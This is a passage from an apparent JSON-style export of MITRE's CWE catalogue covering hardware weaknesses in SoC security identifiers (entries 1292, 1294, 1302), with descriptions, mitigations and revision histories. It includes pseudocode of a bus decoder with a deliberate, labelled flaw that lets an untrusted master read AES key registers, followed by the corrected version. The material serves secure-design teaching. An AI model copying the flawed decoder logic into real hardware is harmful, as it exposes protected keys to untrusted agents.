"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Related_Attack_Patterns",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider a system that has four bus masters and a decoder. The decoder is supposed to decode every bus transaction and assign a corresponding security identifier. The security identifier is used to determine accesses to the assets. The bus transaction that contains the security information is Bus_transaction [15:14], and the bits 15 through 14 contain the security identifier information. The table below provides bus masters as well as their security identifiers and trust assumptions: \n\n| Bus Master | Security Identifier Decoding | Trust Assumptions | \n| --- | --- | --- |\n| Master_0 | \"00\" | Untrusted |\n| Master_1 | \"01\" | Trusted |\n| Master_2 | \"10\" | Untrusted |\n| Master_3 | \"11\" | Untrusted |\n\n\t\n The assets are the AES-Key registers for encryption or decryption. The key is 128 bits implemented as a set of four 32-bit registers. The AES_KEY_ACCESS_POLICY is used to define which agents with a security identifier in the transaction can access the AES-key registers. The size of the security identifier is 4 bits (i.e., bit 3 through 0). Each bit in these 4 bits defines a security identifier. There are only 4 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., \"1\") allows respective action from an agent whose identity matches the number of the bit. If clear (i.e., \"0\"), disallows the respective action to that corresponding agent. \n\n\t| Register | Field description | \n| --- | --- |\n| AES_ENC_DEC_KEY_0 | AES key [0:31] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_1 | AES key [32:63] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_2 | AES key [64:95] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_3 | AES key [96:127] for encryption or decryption Default 0x00000000 |\n| AES_KEY_ACCESS_POLCY | [31:4] Default 0x00000000 [3:0]-0x01 agent with Security Identified \"1\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers |",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The following Pseudo code outlines the process of checking the value of the Security Identifier within the AES_KEY_ACCESS_POLICY register:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t If (AES_KEY_ACCESS_POLICY[Security_Identifier] == \"1\") \n\t\t Allow access to AES-Key registers \n\t Else \n\t\t Deny access to AES-Key registers \n```",
"IntroText": null,
"Language": "Other",
"Nature": "Informative",
"Reference": null
},
{
"BodyText": "Below is a decoder's Pseudo code that only checks for bit [14] of the bus transaction to determine what Security Identifier it must assign.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t If (Bus_transaction[14] == \"1\") \n\t\t Security_Identifier == \"1\" \n\t Else \n\t\t Security_Identifier == \"0\" \n```",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The security identifier is two bits, but the decoder code above only checks the value of one bit. Two Masters have their bit 0 set to \"1\" - Master_1 and Master_3. Master_1 is trusted, while Master_3 is not. The code above would therefore allow an untrusted agent, Master_3, access to the AES-Key registers in addition to intended trusted Master_1. \n The decoder should check for the entire size of the security identifier in the bus-transaction signal to assign a corresponding security identifier. The following is good Pseudo code:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t If (Bus_transaction[15:14] == \"00\") \n\t\t Security_Identifier == \"0\" \n\t If (Bus_transaction[15:14] == \"01\") \n\t\t Security_Identifier == \"1\" \n\t If (Bus_transaction[15:14] == \"10\") \n\t\t Security_Identifier == \"2\" \n\t If (Bus_transaction[15:14] == \"11\") \n\t\t Security_Identifier == \"3\" \n```",
"IntroText": null,
"Language": "Other",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1290"
]
] |
[] |
1292
|
Incorrect Conversion of Security Identifiers
|
Base
|
Simple
|
Draft
|
The product implements a conversion mechanism to map certain bus-transaction signals to security identifiers. However, if the conversion is incorrectly implemented, untrusted agents can gain unauthorized access to the asset.
|
In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. This security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and writes).
A typical bus connects several leader and follower agents. Some follower agents implement bus protocols differently from leader agents. A protocol conversion happens at a bridge to seamlessly connect different protocols on the bus. One example is a system that implements a leader with the Advanced High-performance Bus (AHB) protocol and a follower with the Open-Core Protocol (OCP). A bridge AHB-to-OCP is needed to translate the transaction from one form to the other.
A common weakness that can exist in this scenario is that this conversion between protocols is implemented incorrectly, whereupon an untrusted agent may gain unauthorized access to an asset.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Bus/Interface Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases.",
"Phase": "Architecture and Design"
},
{
"Note": "Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"DoS: Resource Consumption (Other)",
"Execute Unauthorized Code or Commands",
"Gain Privileges or Assume Identity",
"Quality Degradation"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "Security identifier decoders must be reviewed for design inconsistency and common weaknesses.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Access and programming flows must be tested in pre-silicon and post-silicon testing.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] | null | null | null | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-04-29",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-08-20",
"SubmissionVersion": "4.2",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Related_Attack_Patterns",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider a system that supports AHB. Let us assume we have a follower agent that only understands OCP. To connect this follower to the leader, a bridge is introduced, i.e., AHB to OCP. \n\n\n The follower has assets to protect accesses from untrusted leaders, and it employs access controls based on policy, (e.g., AES-Key registers for encryption or decryption). The key is 128 bits implemented as a set of four 32-bit registers. The key registers are assets, and register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls. \n\n\n The AES_KEY_ACCESS_POLICY access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. The implemented AES_KEY_ACCESS_POLICY has 4 bits where each bit when \"Set\" allows access to the AES-Key registers to the corresponding agent that has the security identifier. The other bits from 31 through 4 are reserved and not used. \n\n| | \n|\n| Register | Field Description |\n| AES_ENC_DEC_KEY_0 | AES key [0:31] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_1 | AES key [32:63] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_2 | AES key [64:95] for encryption or decryption Default 0x00000000 |\n| AES_ENC_DEC_KEY_3 | AES key [96:127] for encryption or decryption Default 0x00000000 |\n| AES_KEY_ACCESS_POLICY | [31:4] Default 0x000000 [3:0] - 0x02 agent with Security Identifier \"1\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers |\n\n\t\n During conversion of the AHB-to-OCP transaction, the security identifier information must be preserved and passed on to the follower correctly.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "In AHB-to-OCP bridge, the security identifier information conversion is done incorrectly.",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Because of the incorrect conversion, the security identifier information is either lost or could be modified in such a way that an untrusted leader can access the AES-Key registers.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "The conversion of the signals from one protocol (AHB) to another (OCP) must be done while preserving the security identifier correctly.",
"IntroText": null,
"Language": "Other",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1292"
]
] |
[] |
1294
|
Insecure Security Identifier Mechanism
|
Class
|
Simple
|
Incomplete
|
The System-on-Chip (SoC) implements a Security Identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Identifiers are not correctly implemented.
|
Systems-On-Chip (Integrated circuits and hardware engines) implement Security Identifiers to differentiate/identify actions originated from various agents. These actions could be 'read', 'write', 'program', 'reset', 'fetch', 'compute', etc. Security identifiers are generated and assigned to every agent in the System (SoC) that is either capable of generating an action or receiving an action from another agent. Every agent could be assigned a unique, Security Identifier based on its trust level or privileges.
A broad class of flaws can exist in the Security Identifier process, including but not limited to missing security identifiers, improper conversion of security identifiers, incorrect generation of security identifiers, etc.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Bus/Interface Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases.",
"Phase": "Architecture and Design"
},
{
"Note": "Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"DoS: Resource Consumption (Other)",
"Execute Unauthorized Code or Commands",
"Gain Privileges or Assume Identity",
"Quality Degradation"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "Security Identifier Decoders must be reviewed for design inconsistency and common weaknesses.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Access and programming flows must be tested in pre-silicon and post-silicon testing.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"121",
"681"
] | null |
[
{
"Note": "This entry is still under development and will continue to see updates and content improvements.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-07-17",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2020-08-20",
"SubmissionVersion": "4.2",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed-with-Review
|
This CWE entry is a Class and might have Base-level children that would be more appropriate
|
Examine children of this entry to see if there is a better fit
|
[
"Abstraction"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"1294"
]
] |
[
"1302"
] |
1302
|
Missing Source Identifier in Entity Transactions on a System-On-Chip (SOC)
|
Base
|
Simple
|
Incomplete
|
The product implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. A transaction is sent without a security identifier.
|
In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute). A typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity) in addition to much more information in the message. Sometimes the transactions are qualified with a Security Identifier. This Security Identifier helps the destination agent decide on the set of allowed or disallowed actions.
A weakness that can exist in such transaction schemes is that the source agent does not consistently include the necessary Security Identifier with the transaction. If the Security Identifier is missing, the destination agent might drop the message (resulting in an inadvertent Denial-of-Service (DoS)) or take inappropriate action by default in its attempt to execute the transaction, resulting in privilege escalation or provision of unintended access.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases.",
"Phase": "Architecture and Design"
},
{
"Note": "Such issues could be introduced during implementation and identified later during Testing or System Configuration phases.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"DoS: Crash, Exit, or Restart",
"Bypass Protection Mechanism",
"Execute Unauthorized Code or Commands"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "Transaction details must be reviewed for design inconsistency and common weaknesses.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Security identifier definition and programming flow must be tested in pre-silicon and post-silicon testing.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"121",
"681"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-02-14",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-08-20",
"SubmissionVersion": "4.2",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
